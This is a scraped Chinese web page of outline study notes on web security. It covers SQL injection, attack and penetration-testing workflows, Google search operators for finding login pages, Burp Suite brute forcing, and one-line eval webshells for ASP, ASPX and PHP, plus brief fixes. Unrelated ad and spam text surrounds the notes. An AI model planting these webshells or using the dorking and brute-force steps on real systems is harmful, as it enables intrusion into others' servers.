<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。 廣告
                [TOC] ### **常見web安全漏洞** `sql`注入 ### **黑客攻擊思路簡圖** - 信息收集 攻擊測試 提升權限 擴大成果 清除痕跡 ### **滲透測試思路簡圖** - 信息收集 攻擊測試 ### **暴力破解等介紹** **google黑語法** - `inurl`: 搜索url網址中包含的指定字符串 在搜索引擎的搜索框里輸入 ``` $ inurl:login:php ``` - `intitle`: 搜索網頁中的標題名中是否包含指定字 ``` $ intitle:登錄 ``` - `intext`:搜索網頁正文內容中的指定字符 ``` intext:登錄 ``` **Burpsuite常用功能** - 攔截 ``` > intercept ``` - 抓包 - 改包 -- 暴力破解 ``` intruder ``` - 重放 - 不同驗證碼的講解 ![](https://i.loli.net/2019/07/25/5d38e66d34c2331239.png) **后臺暴力破解** - 存在暴力破解的特點 登錄數據包不存在`驗證碼`、`token`等`一次性驗證` ***** ### **常見漏洞的介紹** #### **一句話木馬** ``` asp: <%eval request("pass")%> aspx:<%@Page Language%><%eval(Request.Item["pass"]." unsafe")%> php: < ?php @eval($_POST['pass']; )?> ``` `MIME` 多用途互聯網郵件擴展類型 - 常見的MIME有哪些類型 ![](https://i.loli.net/2019/07/25/5d38ebafd444818792.png) #### **工具** `中國菜刀` ***** ### **漏洞補丁的補寫** 1. 防止暴力破解修復方案 - 添加驗證碼 - 添加token 2. 防止上傳暴力破解方案
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看